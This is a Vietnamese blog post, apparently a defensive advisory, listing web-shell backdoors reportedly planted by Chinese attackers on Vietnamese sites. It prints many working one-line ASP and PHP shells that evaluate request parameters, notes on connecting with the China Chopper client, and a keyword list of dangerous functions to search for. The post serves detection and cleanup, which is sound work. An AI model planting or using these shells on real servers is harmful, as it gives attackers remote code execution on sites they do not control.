Trong đợt hàng loạt website Việt Nam bị tấn công bởi các "hacker" Trung quốc vừa qua, Website của các bạn có thể đã, đang hoặc sẽ bị tấn công. Để đảm bảo an toàn cho những hệ thống của mình, các bạn nên rà soát lại toàn bộ source web, server,... của mình để phát hiện và loại bỏ những backdoor được gắn bởi các "hacker" Trung Quốc trong đợt vừa qua.
--- Đối với ASP:
1) <%eval request("sb")%>
2) <%execute request("sb")%>
3) <%execute(request("sb"))%>
4) <%execute request("sb")%><%'<% loop <%:%>
5) <%'<% loop <%:%><%execute request("sb")%>
6) <%execute request("sb")'<% loop <%:%>
7) <script language=vbs runat=server>eval(request("sb"))
8) %><%Eval(Request(chr(35)))%><%
9) <%eval request("sb")%>
10) <%eval_r(Request("0x001"))%>
11) <%ExecuteGlobal request("sb")%>
12) if Request("sb")<>"" then ExecuteGlobal request("sb") end if
13) <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : 'o040'};lcx.性别((lcx.名字)+'');%>
14) <%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>
-- Đối với PHP :
1) <?php eval($_POST[sb]);?>
2) <?php @eval($_POST[sb]);?>
3) <?php assert($_POST[sb]);?>
4) <?$_POST['sa']($_POST['sb']);?>
5) <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6) <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
<O>h=@eval($_POST[c]);</O>
7) <script language="php">@eval($_POST[sb])</script>
8) $filename=$_GET['xbid'];
include ($filename);
Rà soát lại tất cả các cấu trúc có sử dụng các hàm:
exec|base64_decode|edoced_46esab|eval|eval_r|system|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source|assert|_POST|_GET|_REQUEST|GLOBALS
Ngoài ra còn rất nhiều đoạn code với các kiểu encode khác nhau tại đây http://pastebin.com/3GBe7gGX
Nguồn : CEH
Đăng ký:
Đăng Nhận xét (Atom)
0 nhận xét:
Đăng nhận xét